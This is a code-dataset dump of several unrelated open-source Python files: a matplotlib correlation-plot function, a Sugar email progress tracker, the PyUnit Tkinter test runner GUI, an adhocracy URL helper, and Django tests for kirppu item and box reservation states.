        units = 'mins'
        prefix = 't'
    else:
        units = ''  # generations are used
        prefix = 'g'
    timelabel = r'$\Delta$' + timelabel

    nplots = 2
    fig = plt.figure(figsize=(axe_xsize, (nplots + 1)*axe_ysize))
    gs = gridspec.GridSpec(nplots + 1, 1)
    ax1 = fig.add_subplot(gs[0])   # counts panel
    ax2 = fig.add_subplot(gs[1:])  # correlation panel (double height)

    # build condition list
    if isinstance(stationary, StationaryUnivariate):
        conditions = _set_condition_list(stationary.univariate, show_cdts=show_cdts)
    elif isinstance(stationary, StationaryBivariate):
        conditions = []
        conditions_0 = _set_condition_list(stationary.univariates[0], show_cdts=show_cdts)
        conditions_1 = _set_condition_list(stationary.univariates[1], show_cdts=show_cdts)
        # intersect: only conditions defined for both univariates make sense
        for cdt in conditions_0:
            if cdt in conditions_1:
                conditions.append(cdt)

    # accumulators used to compute axis limits over all conditions
    all_times = []
    all_counts = []
    all_corrs = []

    main_handles = []  # for legend
    ci_handles = []
    for index, cdt in enumerate(conditions):
        if cdt == 'master':
            c_repr = 'master'
            c_label = 'all samples'
            lw = default_lw + 1  # master curve is emphasized
            alpha = 1
            alpha_fill = .5
        else:
            c_repr = repr(cdt)
            if show_cdt_details_in_legend:
                c_label = str(cdt)
            else:
                c_label = cdt.label
            lw = default_lw
            alpha = .8
            alpha_fill = 0.3
        array = stationary[c_repr].array
        nonzero = np.where(array['counts'] > 1)  # 1 sample does not have std
        dts = array['time_interval'][nonzero]
        all_times.extend(dts)
        counts = array['counts'][nonzero]
        all_counts.extend(counts)
        if isinstance(stationary, StationaryUnivariate):
            corr = array['auto_correlation'][nonzero]
        else:
            corr = array['cross_correlation'][nonzero]
        try:
            dev = array['std_dev'][nonzero]
        except ValueError:  # structured array has no 'std_dev' field
            dev = None

        # counts
        label = '{}'.format(c_label)
        line, = ax1.plot(dts, counts, lw=lw, alpha=alpha, label=label)
        main_handles.append(line)
        col = line.get_color()  # reuse the same color on the lower panel

        # autocorrelation: divide by variance
        if isinstance(stationary, StationaryUnivariate):
            norm = corr[0]
        # cross-correlation: divide covariance by product of standard devs
        elif isinstance(stationary, StationaryBivariate):
            prod = 1.
            for single in stationary.univariates:
                prod *= np.sqrt(single[c_repr].stationary.autocorr[0])
            norm = prod
        dat, = ax2.plot(dts, corr/norm, color=col,
                        lw=lw, alpha=alpha, label=label)
        all_corrs.extend(corr/norm)
        if dev is not None:
            # 2.58 standard errors ~ 99% confidence interval on the mean
            se = 2.58 * dev / np.sqrt(counts)
            ci = ax2.fill_between(dts, (corr-se)/norm, (corr+se)/norm,
                                  facecolor=col, alpha=alpha_fill,
                                  label='.99 C.I.')
            ci_handles.append(ci)
            all_corrs.extend((corr-se)/norm)
            all_corrs.extend((corr+se)/norm)

    # vertical lines for timing
    for val in time_guides:
        ax2.axvline(val, ls=':', color='C7', alpha=.5)
    # horizontal lines for correlation ref
    for val in corr_guides:
        ax2.axhline(val, ls=':', color='C7', alpha=.5)

    # ## limits and ticks ##
    # xaxis
    for ax in [ax1, ax2]:
        left, right = _set_axis_limits(ax, all_times, which='x',
                                       pad=time_fractional_pad,
                                       force_range=time_range)
        ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))

    if show_exp_decay is not None:
        tt = np.linspace(left, right, 100)
        yy = np.exp(-show_exp_decay*np.abs(tt))
        lab = r'${}_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(prefix, 1./show_exp_decay, units)
        ref, = ax2.plot(tt, yy, '-.', color='C7', alpha=1,
                        label=lab)
        main_handles.append(ref)

    # ## yaxis limits ##
    # counts
    formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
    formatter.set_powerlimits((-2, 4))
    if not counts_logscale:
        _set_axis_limits(ax1, all_counts, which='y', pad=counts_fractional_pad,
                         force_range=counts_range)
        ax1.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
        ax1.yaxis.set_major_formatter(formatter)
        _relocate_offset_text(ax1)
    else:
        ax1.set_yscale('symlog', linthresh=1)
    # corr
    if not corr_logscale:
        bottom, top = _set_axis_limits(ax2, all_corrs, which='y',
                                       pad=corr_fractional_pad,
                                       force_range=corr_range)
        if top > 2 or bottom < -2:
            locator = ticker.MaxNLocator(nbins=5, integer=True)
        else:
            # correlations live in [-1, 1]: use fixed, readable ticks
            locator = ticker.FixedLocator([-1, -.5, 0., .5, 1])
        ax2.yaxis.set_major_locator(locator)
        ax2.yaxis.set_major_formatter(formatter)
        _relocate_offset_text(ax2)
    else:
        # use the non-axis-suffixed kwargs (linthresh/linscale/subs), consistent
        # with the counts panel above; the *y-suffixed forms were removed in
        # matplotlib 3.5
        ax2.set_yscale('symlog', linthresh=0.1, linscale=0.2,
                       subs=[2, 3, 4, 5, 6, 7, 8, 9])
        if corr_range[0] is not None and corr_range[0] > 0.:
            ax2.set_ylim(bottom=corr_range[0])

    ax1.tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
    ax2.set_xlabel(timelabel, x=.95, horizontalalignment='right',
                   fontsize='medium')

    # hide intermediate x axis
    ax1.spines['bottom'].set_visible(False)
    ax1.tick_params(axis='x', colors='C7')
    ax2.spines['top'].set_color('C7')

    # ylabels
    ax1.set_ylabel(r'Counts', fontsize='medium')
    if isinstance(stationary, StationaryUnivariate):
        ax2.set_ylabel(r'$\tilde{{a}}(\Delta {})$'.format(prefix), fontsize='medium')
    elif isinstance(stationary, StationaryBivariate):
        ax2.set_ylabel(r'$\tilde{{c}}(\Delta {})$'.format(prefix), fontsize='medium')

    # writing observable in the title
    # case: obs is a single observable
    if isinstance(stationary, StationaryUnivariate):
        msg = '{}:{}'.format(obs.latexify(shorten_time_variable=True, use_name=use_obs_name),
                             obs.latexify(plus_delta=True, shorten_time_variable=True, use_name=use_obs_name))
    # case: obs is a couple of observables
    else:
        if use_obs_name is not None:
            if isinstance(use_obs_name, str):
                use_name_0 = use_obs_name
                use_name_1 = None
            else:
                if len(use_obs_name) == 1:
                    use_name_0 = use_obs_name[0]
                    use_name_1 = None
                else:
                    use_name_0 = use_obs_name[0]
                    use_name_1 = use_obs_name[1]
        else:
            use_name_0 = None
            use_name_1 = None
        msg = '{}:{}'.format(obs[0].latexify(shorten_time_variable=True,
                                             use_name=use_name_0),
                             obs[1].latexify(plus_delta=True, shorten_time_variable=True,
                                             use_name=use_name_1))

    ax1.text(0.5, 1+.2/axe_ysize, r'{}'.format(msg),
             size='large',
             horizontalalignment='center',
             verticalalignment='bottom',
             transform=ax1.transAxes)

    # ## legend ##
    # C.I.: show a single, generic entry for all confidence intervals
    if ci_handles:
        ci = ci_handles[0]
        # ci.set_color('C7')
        ci.set_label('.99 C.I.')
        main_handles.append(ci)
    handles = main_handles[:]
    labels = [h.get_label() for h in handles]
    if show_legend:
        ax2.legend(handles=handles, labels=labels, loc='upper left',
                   bbox_to_anchor=(0, -.25/axe_ysize), labelspacing=.2)

    fig.subplots_adjust(hspace=0)
    if save:
        # get univariate instance to get path where to save figure
        bname = 'plot_stationary_'
        try:
            obs_path = stationary._get_obs_path(write=False)
        except text.MissingFolderError:
            # export data files first so the canonical folder exists
            stationary.write_text()
            obs_path = stationary._get_obs_path(write=False)
        obsname = os.path.basename(obs_path)
        bname += obsname + '_'
        bname += stationary.region.name + ext
        fname = os.path.join(obs_path, bname)
        fig.savefig(fname, bbox_inches='tight', pad_inches=0)
        if verbose:
            print('Figure saved as {}'.format(fname))
    return fig
| mit | -8,386,384,393,471,840,000 | 37.286184 | 111 | 0.570725 | false | 3.65317 | false | false | false |
FOSSRIT/sweetermail | tracker.py | 1 | 4542 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import email
import email.utils
import gtk
from gettext import gettext as _
from sugar.graphics.icon import Icon
from sugar.graphics import alert
from tags import FLAGS, HARDCODED
def ugly_hack(self, papa, pspec, value):
if pspec.name=='msg':
if self._msg != value:
self._msg = value
self._msg_label.set_markup(self._msg)
else:
papa.do_set_property(self, pspec, value)
class ProgressAlert(alert.Alert):
def __init__(self, *args, **kwds):
alert.Alert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-busy')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.Alert, pspec, value)
class ErrorAlert(alert.NotifyAlert):
def __init__(self, *args, **kwds):
alert.NotifyAlert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-notification')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.NotifyAlert, pspec, value)
class ProgressTracker(object):
def __init__(self, activity, title):
self._activity = activity
self._title = title
self._alert = ProgressAlert()
self._alert.props.title = title
#self._activity.add_alert(self._alert)
def _remove_alert(self, *args):
gtk.gdk.threads_enter()
self._activity.remove_alert(self._alert)
gtk.gdk.threads_leave()
def done(self):
self._remove_alert()
def update(self, msg):
gtk.gdk.threads_enter()
self._alert.props.msg = msg
gtk.gdk.threads_leave()
def error(self, msg, remove_old=True):
if remove_old: self._remove_alert()
gtk.gdk.threads_enter()
notify(self._activity, self._title, msg)
gtk.gdk.threads_leave()
class InboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Checking email'))
def dump_msg(self, msg_str):
# TODO setting of FLAGS{'has_attachment'], filtering(!)
msg = email.message_from_string(msg_str)
ms = self._activity.ms
key = ms.add_msg(msg)
#if add_msg thinks it's a duplicate, don't associate it
if key == -1:
pass
# gmail sent emails hack
'''
if email.utils.parseaddr(msg['From'])[1]==self._activity.config.transport_account._from_addr:
ms.flag(key, FLAGS['sent'])
else:
ms.associate(HARDCODED['inbox'], key)
'''
ms.associate(HARDCODED['inbox'], key)
class OutboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Sending email'))
def _add_and_flag(self, msg, flag):
ms = self._activity.ms
key = ms.add_msg(msg)
ms.flag(key, flag)
def try_later(self, msgs):
for msg in msgs:
self._add_and_flag(msg, FLAGS['outbound'])
def error_delivering(self, msg):
self._add_and_flag(msg, FLAGS['draft'])
ProgressTracker.error(self, _('Error delivering <i>%s</i>, message saved as draft.' % msg['Subject']), remove_old=False)
def some_rcpts_failed(self, msg, who):
msg['To'] = '; '.join(who)
self._add_and_flag(msg, FLAGS['draft'])
ProgressTracker.error(self, _('Error delivering <i></i> to %s; saved as draft.' % ', '.join(who)), remove_old=False)
def sent(self, msg):
self._add_and_flag(msg, FLAGS['sent'])
def notify(activity, title, msg, timeout=5):
alert = ErrorAlert(timeout)
alert.props.title = title
alert.props.msg = msg
activity.add_alert(alert)
alert.connect('response', lambda x,y: activity.remove_alert(alert))
| gpl-3.0 | -5,689,568,841,829,974,000 | 32.895522 | 128 | 0.624395 | false | 3.686688 | false | false | false |
Fat-Zer/FreeCAD_sf_master | src/Mod/Test/unittestgui.py | 12 | 15996 | #!/usr/bin/env python
"""
GUI framework and application for use with Python unit testing framework.
Execute tests written using the framework provided by the 'unittest' module.
Further information is available in the bundled documentation, and from
http://pyunit.sourceforge.net/
Copyright (c) 1999, 2000, 2001 Steve Purcell
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__author__ = "Steve Purcell ([email protected])"
__version__ = "$Revision: 2.0 $"[11:-2]
import unittest
import sys
import Tkinter
import tkMessageBox
import traceback
import string
tk = Tkinter # Alternative to the messy 'from Tkinter import *' often seen
##############################################################################
# GUI framework classes
##############################################################################
class BaseGUITestRunner:
"""Subclass this class to create a GUI TestRunner that uses a specific
windowing toolkit. The class takes care of running tests in the correct
manner, and making callbacks to the derived class to obtain information
or signal that events have occurred.
"""
def __init__(self, *args, **kwargs):
self.currentResult = None
self.running = 0
self.__rollbackImporter = None
self.initGUI(*args, **kwargs)
def getSelectedTestName(self):
"Override to return the name of the test selected to be run"
pass
def errorDialog(self, title, message):
"Override to display an error arising from GUI usage"
pass
def runClicked(self):
"To be called in response to user choosing to run a test"
if self.running: return
testName = self.getSelectedTestName()
if not testName:
self.errorDialog("Test name entry", "You must enter a test name")
return
if self.__rollbackImporter:
self.__rollbackImporter.rollbackImports()
self.__rollbackImporter = RollbackImporter()
try:
test = unittest.defaultTestLoader.loadTestsFromName(testName)
except Exception:
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(*sys.exc_info())
self.errorDialog("Unable to run test '%s'" % testName,
"Error loading specified test: %s, %s" % \
(exc_type, exc_value))
return
self.currentResult = GUITestResult(self)
self.totalTests = test.countTestCases()
self.running = 1
self.notifyRunning()
test.run(self.currentResult)
self.running = 0
self.notifyStopped()
def stopClicked(self):
"To be called in response to user stopping the running of a test"
if self.currentResult:
self.currentResult.stop()
# Required callbacks
def notifyRunning(self):
"Override to set GUI in 'running' mode, enabling 'stop' button etc."
pass
def notifyStopped(self):
"Override to set GUI in 'stopped' mode, enabling 'run' button etc."
pass
def notifyTestFailed(self, test, err):
"Override to indicate that a test has just failed"
pass
def notifyTestErrored(self, test, err):
"Override to indicate that a test has just errored"
pass
def notifyTestStarted(self, test):
"Override to indicate that a test is about to run"
pass
def notifyTestFinished(self, test):
"""Override to indicate that a test has finished (it may already have
failed or errored)"""
pass
class GUITestResult(unittest.TestResult):
"""A TestResult that makes callbacks to its associated GUI TestRunner.
Used by BaseGUITestRunner. Need not be created directly.
"""
def __init__(self, callback):
unittest.TestResult.__init__(self)
self.callback = callback
def addError(self, test, err):
unittest.TestResult.addError(self, test, err)
self.callback.notifyTestErrored(test, err)
def addFailure(self, test, err):
unittest.TestResult.addFailure(self, test, err)
self.callback.notifyTestFailed(test, err)
def stopTest(self, test):
unittest.TestResult.stopTest(self, test)
self.callback.notifyTestFinished(test)
def startTest(self, test):
unittest.TestResult.startTest(self, test)
self.callback.notifyTestStarted(test)
class RollbackImporter:
"""This tricky little class is used to make sure that modules under test
will be reloaded the next time they are imported.
"""
def __init__(self):
self.previousModules = sys.modules.copy()
def rollbackImports(self):
for modname in sys.modules.keys():
if modname not in self.previousModules:
# Force reload when modname next imported
del(sys.modules[modname])
##############################################################################
# Tkinter GUI
##############################################################################
_ABOUT_TEXT="""\
PyUnit unit testing framework.
For more information, visit
http://pyunit.sourceforge.net/
Copyright (c) 2000 Steve Purcell
<[email protected]>
"""
_HELP_TEXT="""\
Enter the name of a callable object which, when called, will return a \
TestCase or TestSuite. Click 'start', and the test thus produced will be run.
Double click on an error in the listbox to see more information about it, \
including the stack trace.
For more information, visit
http://pyunit.sourceforge.net/
or see the bundled documentation
"""
class TkTestRunner(BaseGUITestRunner):
"""An implementation of BaseGUITestRunner using Tkinter.
"""
def initGUI(self, root, initialTestName):
"""Set up the GUI inside the given root window. The test name entry
field will be pre-filled with the given initialTestName.
"""
self.root = root
# Set up values that will be tied to widgets
self.suiteNameVar = tk.StringVar()
self.suiteNameVar.set(initialTestName)
self.statusVar = tk.StringVar()
self.statusVar.set("Idle")
self.runCountVar = tk.IntVar()
self.failCountVar = tk.IntVar()
self.errorCountVar = tk.IntVar()
self.remainingCountVar = tk.IntVar()
self.top = tk.Frame()
self.top.pack(fill=tk.BOTH, expand=1)
self.createWidgets()
def createWidgets(self):
"""Creates and packs the various widgets.
Why is it that GUI code always ends up looking a mess, despite all the
best intentions to keep it tidy? Answers on a postcard, please.
"""
# Status bar
statusFrame = tk.Frame(self.top, relief=tk.SUNKEN, borderwidth=2)
statusFrame.pack(anchor=tk.SW, fill=tk.X, side=tk.BOTTOM)
tk.Label(statusFrame, textvariable=self.statusVar).pack(side=tk.LEFT)
# Area to enter name of test to run
leftFrame = tk.Frame(self.top, borderwidth=3)
leftFrame.pack(fill=tk.BOTH, side=tk.LEFT, anchor=tk.NW, expand=1)
suiteNameFrame = tk.Frame(leftFrame, borderwidth=3)
suiteNameFrame.pack(fill=tk.X)
tk.Label(suiteNameFrame, text="Enter test name:").pack(side=tk.LEFT)
e = tk.Entry(suiteNameFrame, textvariable=self.suiteNameVar, width=25)
e.pack(side=tk.LEFT, fill=tk.X, expand=1)
e.focus_set()
e.bind('<Key-Return>', lambda e, self=self: self.runClicked())
# Progress bar
progressFrame = tk.Frame(leftFrame, relief=tk.GROOVE, borderwidth=2)
progressFrame.pack(fill=tk.X, expand=0, anchor=tk.NW)
tk.Label(progressFrame, text="Progress:").pack(anchor=tk.W)
self.progressBar = ProgressBar(progressFrame, relief=tk.SUNKEN,
borderwidth=2)
self.progressBar.pack(fill=tk.X, expand=1)
# Area with buttons to start/stop tests and quit
buttonFrame = tk.Frame(self.top, borderwidth=3)
buttonFrame.pack(side=tk.LEFT, anchor=tk.NW, fill=tk.Y)
self.stopGoButton = tk.Button(buttonFrame, text="Start",
command=self.runClicked)
self.stopGoButton.pack(fill=tk.X)
tk.Button(buttonFrame, text="Close",
command=self.top.quit).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="About",
command=self.showAboutDialog).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="Help",
command=self.showHelpDialog).pack(side=tk.BOTTOM, fill=tk.X)
# Area with labels reporting results
for label, var in (('Run:', self.runCountVar),
('Failures:', self.failCountVar),
('Errors:', self.errorCountVar),
('Remaining:', self.remainingCountVar)):
tk.Label(progressFrame, text=label).pack(side=tk.LEFT)
tk.Label(progressFrame, textvariable=var,
foreground="blue").pack(side=tk.LEFT, fill=tk.X,
expand=1, anchor=tk.W)
# List box showing errors and failures
tk.Label(leftFrame, text="Failures and errors:").pack(anchor=tk.W)
listFrame = tk.Frame(leftFrame, relief=tk.SUNKEN, borderwidth=2)
listFrame.pack(fill=tk.BOTH, anchor=tk.NW, expand=1)
self.errorListbox = tk.Listbox(listFrame, foreground='red',
selectmode=tk.SINGLE,
selectborderwidth=0)
self.errorListbox.pack(side=tk.LEFT, fill=tk.BOTH, expand=1,
anchor=tk.NW)
listScroll = tk.Scrollbar(listFrame, command=self.errorListbox.yview)
listScroll.pack(side=tk.LEFT, fill=tk.Y, anchor=tk.N)
self.errorListbox.bind("<Double-1>",
lambda e, self=self: self.showSelectedError())
self.errorListbox.configure(yscrollcommand=listScroll.set)
def getSelectedTestName(self):
return self.suiteNameVar.get()
def errorDialog(self, title, message):
tkMessageBox.showerror(parent=self.root, title=title,
message=message)
def notifyRunning(self):
self.runCountVar.set(0)
self.failCountVar.set(0)
self.errorCountVar.set(0)
self.remainingCountVar.set(self.totalTests)
self.errorInfo = []
while self.errorListbox.size():
self.errorListbox.delete(0)
#Stopping seems not to work, so simply disable the start button
#self.stopGoButton.config(command=self.stopClicked, text="Stop")
self.stopGoButton.config(state=tk.DISABLED)
self.progressBar.setProgressFraction(0.0)
self.top.update_idletasks()
def notifyStopped(self):
self.stopGoButton.config(state=tk.ACTIVE)
#self.stopGoButton.config(command=self.runClicked, text="Start")
self.statusVar.set("Idle")
def notifyTestStarted(self, test):
self.statusVar.set(str(test))
self.top.update_idletasks()
def notifyTestFailed(self, test, err):
self.failCountVar.set(1 + self.failCountVar.get())
self.errorListbox.insert(tk.END, "Failure: %s" % test)
self.errorInfo.append((test,err))
def notifyTestErrored(self, test, err):
self.errorCountVar.set(1 + self.errorCountVar.get())
self.errorListbox.insert(tk.END, "Error: %s" % test)
self.errorInfo.append((test,err))
def notifyTestFinished(self, test):
self.remainingCountVar.set(self.remainingCountVar.get() - 1)
self.runCountVar.set(1 + self.runCountVar.get())
fractionDone = float(self.runCountVar.get())/float(self.totalTests)
fillColor = len(self.errorInfo) and "red" or "green"
self.progressBar.setProgressFraction(fractionDone, fillColor)
def showAboutDialog(self):
tkMessageBox.showinfo(parent=self.root, title="About PyUnit",
message=_ABOUT_TEXT)
def showHelpDialog(self):
tkMessageBox.showinfo(parent=self.root, title="PyUnit help",
message=_HELP_TEXT)
def showSelectedError(self):
selection = self.errorListbox.curselection()
if not selection: return
selected = int(selection[0])
txt = self.errorListbox.get(selected)
window = tk.Toplevel(self.root)
window.title(txt)
window.protocol('WM_DELETE_WINDOW', window.quit)
test, error = self.errorInfo[selected]
tk.Label(window, text=str(test),
foreground="red", justify=tk.LEFT).pack(anchor=tk.W)
tracebackLines = traceback.format_exception(*error + (10,))
tracebackText = string.join(tracebackLines,'')
tk.Label(window, text=tracebackText, justify=tk.LEFT).pack()
tk.Button(window, text="Close",
command=window.quit).pack(side=tk.BOTTOM)
window.bind('<Key-Return>', lambda e, w=window: w.quit())
window.mainloop()
window.destroy()
class ProgressBar(tk.Frame):
"""A simple progress bar that shows a percentage progress in
the given colour."""
def __init__(self, *args, **kwargs):
tk.Frame.__init__(*(self,) + args, **kwargs)
self.canvas = tk.Canvas(self, height='20', width='60',
background='white', borderwidth=3)
self.canvas.pack(fill=tk.X, expand=1)
self.rect = self.text = None
self.canvas.bind('<Configure>', self.paint)
self.setProgressFraction(0.0)
def setProgressFraction(self, fraction, color='blue'):
self.fraction = fraction
self.color = color
self.paint()
self.canvas.update_idletasks()
def paint(self, *args):
totalWidth = self.canvas.winfo_width()
width = int(self.fraction * float(totalWidth))
height = self.canvas.winfo_height()
if self.rect is not None: self.canvas.delete(self.rect)
if self.text is not None: self.canvas.delete(self.text)
self.rect = self.canvas.create_rectangle(0, 0, width, height,
fill=self.color)
percentString = "%3.0f%%" % (100.0 * self.fraction)
self.text = self.canvas.create_text(totalWidth/2, height/2,
anchor=tk.CENTER,
text=percentString)
def main(initialTestName=""):
root = tk.Tk()
root.title("PyUnit")
runner = TkTestRunner(root, initialTestName)
root.protocol('WM_DELETE_WINDOW', root.quit)
root.mainloop()
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
main(sys.argv[1])
else:
main()
| lgpl-2.1 | 3,964,741,910,127,345,000 | 38.090226 | 79 | 0.606339 | false | 4.038374 | true | false | false |
SysTheron/adhocracy | src/adhocracy/lib/helpers/selection_helper.py | 5 | 1162 | from pylons.i18n import _
from adhocracy.lib import cache
from adhocracy.lib.helpers import proposal_helper as proposal
from adhocracy.lib.helpers import url as _url
@cache.memoize('selection_url')
def url(selection, member=None, format='html', selection_page=False, **kwargs):
if member is None and format == 'html' and not selection_page:
anchor = "selection_%s" % selection.id
return proposal.url(selection.proposal, anchor=anchor)
url = proposal.url(selection.proposal, member='implementation')
url += "/" + str(selection.id)
return _url.append_member_and_format(url, member=member, format=format,
**kwargs)
@cache.memoize('selection_bc')
def bc_entity(selection):
bc = _url.link(_("Implementation"),
proposal.url(selection.proposal,
member=u'/implementation'))
bc += _url.BREAD_SEP + _url.link(selection.page.title, url(selection))
return bc
def breadcrumbs(selection):
bc = _url.root()
if selection is not None:
bc = bc_entity(selection)
else:
bc += _("Implementation")
return bc
| agpl-3.0 | 8,183,553,078,062,723,000 | 32.2 | 79 | 0.638554 | false | 3.809836 | false | false | false |
jlaunonen/kirppu | kirppu/tests/test_states.py | 1 | 8423 | # -*- coding: utf-8 -*-
from http import HTTPStatus
from django.test import Client, TestCase
import faker
from .factories import *
from .api_access import Api
from . import ResultMixin
from ..models import Item, Receipt, ReceiptItem
__author__ = 'codez'
class PublicTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.type = ItemTypeFactory(event=self.event)
user = self.vendor.user
if not self.client.login(username=user.username, password=UserFactory.DEFAULT_PASSWORD):
raise RuntimeError("Could not log in.")
def test_register_item(self):
data = dict(
name=faker.Faker().sentence(nb_words=3),
price="1.25",
tag_type="short",
suffixes="",
item_type=self.type.id,
adult=False,
)
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/item/".format(self.event.slug),
data=data)).json()
self.assertEqual(1, len(result))
r_item = result[0]
self.assertEqual(self.vendor.id, r_item["vendor_id"])
def test_register_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=4,
bundle_size=1,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_box_with_single_item(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=1,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_single_bundle_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=2,
)
# Returns actually an html-page.. Test within context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
class StatesTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.items = ItemFactory.create_batch(10, vendor=self.vendor)
self.counter = CounterFactory(event=self.event)
self.clerk = ClerkFactory(event=self.event)
self.api = Api(client=self.client, event=self.event)
self.assertSuccess(self.api.clerk_login(code=self.clerk.get_code(), counter=self.counter.private_key))
def test_fail_reserve_without_receipt(self):
ret = self.api.item_reserve(code=self.items[0].code)
self.assertEqual(HTTPStatus.BAD_REQUEST, ret.status_code)
def test_normal_item_receipt(self):
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.STAGED, db_item.state)
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.SOLD, db_item.state)
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_double_reservation(self):
# Note: This tests only two subsequent requests.
# Two simultaneous requests cannot be tested here as basic tests require sequential request/database access.
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
expected_failure = self.api.item_reserve(code=item_code)
self.assertEqual(HTTPStatus.LOCKED, expected_failure.status_code)
def test_normal_box_receipt(self):
box = BoxFactory(adopt=True, items=self.items)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
reserve_count = 3
self.assertSuccess(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count))
self.assertEqual(reserve_count, Item.objects.filter(box=box, state=Item.STAGED).count())
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_box_over_reserve(self):
reserve_count = 3
box = BoxFactory(vendor=VendorFactory(event=self.event), item_count=reserve_count - 1)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertResult(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count),
expect=HTTPStatus.CONFLICT)
def test_box_return_receipt(self):
"""Reserving and releasing box items should avoid representative item,
as it is the one used to display item price.
Relevant when part of box items are sold, and price of rest of its items are changed."""
box = BoxFactory(adopt=True, items=self.items, box_number=1)
Item.objects.all().update(state=Item.BROUGHT)
representative_item_id = box.representative_item_id
receipt = self.assertSuccess(self.api.receipt_start()).json()
def check_count(n):
self.assertEqual(n, Item.objects.filter(state=Item.STAGED).count())
self.assertEqual(n, ReceiptItem.objects.filter(receipt__pk=receipt["id"], action=ReceiptItem.ADD).count())
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=4))
self.assertEqual(4, Item.objects.filter(state=Item.STAGED).count())
# Representative item should not be added to the receipt first.
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
self.assertEqual(2, Item.objects.filter(state=Item.STAGED).count())
# Representative item should be first to be released.
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=8))
check_count(10)
self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=1))
check_count(9)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=1))
check_count(10)
